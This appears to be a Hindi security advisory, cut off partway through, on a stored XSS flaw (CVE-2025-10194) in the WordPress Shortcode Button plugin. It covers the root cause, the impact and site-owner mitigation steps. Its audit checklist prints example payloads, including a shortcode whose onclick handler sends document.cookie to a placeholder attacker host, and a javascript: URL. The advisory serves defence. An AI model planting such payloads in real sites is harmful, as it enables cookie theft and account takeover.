हांगकांग सुरक्षा सलाहकार शॉर्टकोड बटन XSS (CVE202510194)

वर्डप्रेस शॉर्टकोड बटन प्लगइन
प्लगइन का नाम वर्डप्रेस शॉर्टकोड बटन प्लगइन
कमजोरियों का प्रकार स्टोर किया गया XSS
CVE संख्या CVE-2025-10194
तात्कालिकता कम
CVE प्रकाशन तिथि 2025-10-15
स्रोत URL CVE-2025-10194

शॉर्टकोड बटन (≤ 1.1.9) — प्रमाणित योगदानकर्ता संग्रहीत XSS (CVE-2025-10194): वर्डप्रेस साइट मालिकों को क्या करना चाहिए

लेखक: हांगकांग सुरक्षा विशेषज्ञ | तारीख: 2025-10-15

सारांश: एक प्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता जो शॉर्टकोड बटन प्लगइन (संस्करण ≤ 1.1.9, CVE-2025-10194 के रूप में ट्रैक किया गया) को प्रभावित करती है, एक निम्न-privileged उपयोगकर्ता (योगदानकर्ता) को जावास्क्रिप्ट इंजेक्ट करने की अनुमति देती है जो संग्रहीत होती है और जब अन्य उपयोगकर्ता सामग्री देखते हैं तो निष्पादित होती है। यह पोस्ट तकनीकी मूल कारण, वास्तविक दुनिया का प्रभाव, साइट मालिकों के लिए चरण-दर-चरण शमन, डेवलपर सुधार, पहचान तकनीक, और व्यावहारिक वर्चुअल-पैचिंग मार्गदर्शन को समझाती है।.

TL;DR

  • भेद्यता: शॉर्टकोड बटन ≤ 1.1.9 में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)।.
  • CVE: CVE-2025-10194।.
  • आवश्यक विशेषाधिकार: योगदानकर्ता (प्रमाणित उपयोगकर्ता जिसे पोस्ट जोड़ने या संपादित करने की क्षमता है)।.
  • जोखिम: साइट आगंतुकों या प्रशासकों के संदर्भ में मनमाने जावास्क्रिप्ट का निष्पादन, इस पर निर्भर करता है कि प्लगइन सामग्री को कहां प्रस्तुत करता है; सत्र चोरी, सामग्री विकृति, मैलवेयर पर पुनर्निर्देशन, या प्रशासक अधिग्रहण का कारण बन सकता है।.
  • आधिकारिक समाधान: प्रकटीकरण के समय उपलब्ध नहीं है।.
  • तात्कालिक कार्रवाई: यदि आपको इसकी आवश्यकता नहीं है तो प्लगइन को हटा दें/अक्षम करें; योगदानकर्ता क्षमताओं को सीमित करें; सामग्री का ऑडिट और स्वच्छता करें; वर्चुअल पैचिंग लागू करें (WAF नियम)। नीचे उदाहरण नियम और पहचान पैटर्न शामिल हैं।.
  • दीर्घकालिक: जब आधिकारिक अपडेट जारी किया जाए तो प्लगइन को पैच करें या प्लगइन कोड में सुरक्षित कोडिंग सुधार लागू करें।.

यह क्यों महत्वपूर्ण है (व्यावहारिक व्याख्या)

अधिकांश वर्डप्रेस साइट मालिक मानते हैं कि केवल उच्च-privilege खाते ही खतरनाक मार्कअप डाल सकते हैं। शॉर्टकोड समीकरण को बदलते हैं: प्लगइन शॉर्टकोड विशेषताओं को पार्स करते हैं और पोस्ट सामग्री में और कभी-कभी प्रशासन UI में HTML प्रस्तुत करते हैं। यदि एक प्लगइन संग्रहीत करते समय या प्रस्तुत करते समय शॉर्टकोड विशेषताओं को स्वच्छ या एस्केप करने में विफल रहता है, तो एक योगदानकर्ता जावास्क्रिप्ट को एम्बेड कर सकता है जो डेटाबेस में संग्रहीत होती है और बाद में जब कोई उस पृष्ठ को देखता है तो निष्पादित होती है — जिसमें संपादक और प्रशासक शामिल हैं। यह एक संग्रहीत XSS है।.

एक योगदानकर्ता खाते वाला हमलावर कर सकता है:

  • एक पोस्ट या पृष्ठ में एक दुर्भावनापूर्ण शॉर्टकोड डालें जिसे वे नियंत्रित करते हैं जो डेटाबेस में जावास्क्रिप्ट संग्रहीत करता है।.
  • एक संपादक या प्रशासक का पोस्ट देखने का इंतजार करें (उदाहरण के लिए, पूर्वावलोकन या संपादित करें), जिससे उनके ब्राउज़र में निष्पादन होता है और उन उपयोगकर्ताओं के सत्र/प्रमाण पत्र की आवश्यकता वाले कार्यों को सक्षम करता है।.
  • कुकीज़ को निकालें, पीड़ित की ओर से कार्य करें (जावास्क्रिप्ट के माध्यम से CSRF), अतिरिक्त प्रशासक खाते बनाएं, या स्थायी बैकडोर इंजेक्ट करें।.

चूंकि प्लगइन बटन प्रस्तुत करता है, भेद्यता फ्रंट-एंड और बैक-एंड दोनों डिस्प्ले पर ट्रिगर हो सकती है, जिससे हमले की सतह बढ़ जाती है।.

तकनीकी मूल कारण (उच्च स्तर)

शॉर्टकोड प्लगइन्स में संग्रहीत XSS के लिए सामान्य मूल कारण पैटर्न:

  1. प्लगइन उपयोगकर्ता-नियंत्रित विशेषताओं (जैसे, लेबल, यूआरएल, शीर्षक, वर्ग) को स्वीकार करता है।.
  2. यह सहेजते समय इनपुट को स्वच्छ नहीं करता है, या प्रस्तुत करते समय आउटपुट को एस्केप नहीं करता है।.
  3. विशेषता संग्रहीत होती है (post_content, postmeta, या विकल्पों में) और बाद में उचित एस्केपिंग (esc_html, esc_attr, esc_url) के बिना या व्हाइटलिस्टिंग के बिना strip_tags जैसी अपर्याप्त फ़िल्टरिंग के साथ प्रिंट की जाती है।.
  4. प्लगइन योगदानकर्ता द्वारा प्रदान की गई सामग्री पर भरोसा करता है या वर्डप्रेस आंतरिक पर निर्भर करता है जो स्वचालित रूप से शॉर्टकोड विशेषताओं को स्वच्छ नहीं करता है।.
  5. जब संग्रहीत डेटा प्रस्तुत किया जाता है (फ्रंट-एंड, संपादक पूर्वावलोकन, या व्यवस्थापक सूची दृश्य), तो इंजेक्ट किया गया जावास्क्रिप्ट निष्पादित होता है।.

क्लासिक उदाहरणों में स्क्रिप्ट टैग या इवेंट हैंडलर विशेषताएँ (onmouseover=, onclick=), href विशेषताओं में javascript: URLs, या HTML संस्थाएँ शामिल हैं जो प्रस्तुत करने से पहले गलत तरीके से डिकोड की गई हैं।.

कौन सी साइटें प्रभावित हैं?

  • ऐसे साइटें जिन पर शॉर्टकोड बटन प्लगइन स्थापित और सक्रिय है, संस्करण 1.1.9 या उससे पहले।.
  • ऐसे साइटें जो उपयोगकर्ताओं को पंजीकरण करने की अनुमति देती हैं या जो अविश्वसनीय लोगों को योगदानकर्ता भूमिका सौंपती हैं।.
  • ऐसे साइटें जहाँ योगदानकर्ता पोस्ट/पृष्ठ या अन्य सामग्री जोड़ सकते हैं या संपादित कर सकते हैं जिसमें शॉर्टकोड शामिल हो सकते हैं।.

यदि आप सुनिश्चित नहीं हैं कि यह प्लगइन स्थापित है, तो अपने वर्डप्रेस व्यवस्थापक में प्लगइन्स → स्थापित प्लगइन्स के तहत जांचें, या अपने फ़ाइल सिस्टम में उस प्लगइन स्लग के समान फ़ोल्डरों के लिए खोजें।.

तात्कालिक शमन चेकलिस्ट (साइट मालिक / व्यवस्थापक)

यदि आप एक वर्डप्रेस साइट का प्रबंधन करते हैं जो शॉर्टकोड बटन ≤ 1.1.9 का उपयोग करती है, तो तुरंत इस प्राथमिकता वाली चेकलिस्ट का पालन करें:

  1. प्रशासनिक कार्य के लिए साइट को रखरखाव मोड में डालें (वैकल्पिक लेकिन अनुशंसित)।.
  2. शॉर्टकोड बटन प्लगइन को निष्क्रिय करें।.
    • यदि आप प्लगइन की कार्यक्षमता पर निर्भर हैं और तुरंत इसे हटा नहीं सकते, तो नीचे दिए गए WAF वर्चुअल पैचिंग चरणों पर आगे बढ़ें और योगदानकर्ता क्रियाओं को सीमित करें जब तक कि एक समाधान उपलब्ध न हो।.
  3. योगदानकर्ता द्वारा बनाई गई सामग्री का ऑडिट करें:
    • प्लगइन शॉर्टकोड(s) के लिए पोस्ट और पृष्ठों की खोज करें और संदिग्ध पेलोड जैसे विशेषताओं का निरीक्षण करें
    • विशेषताओं में इवेंट हैंडलर:
      [shortcode_button label="क्लिक करें" url="#" onclick="document.location='https://attacker/?c='+document.cookie"]
    • जावास्क्रिप्ट: href में URL:
      [shortcode_button label="जाएं" url="javascript:"]
    • एन्कोडेड/ओबफस्केटेड जावास्क्रिप्ट:
      Using entity encoding like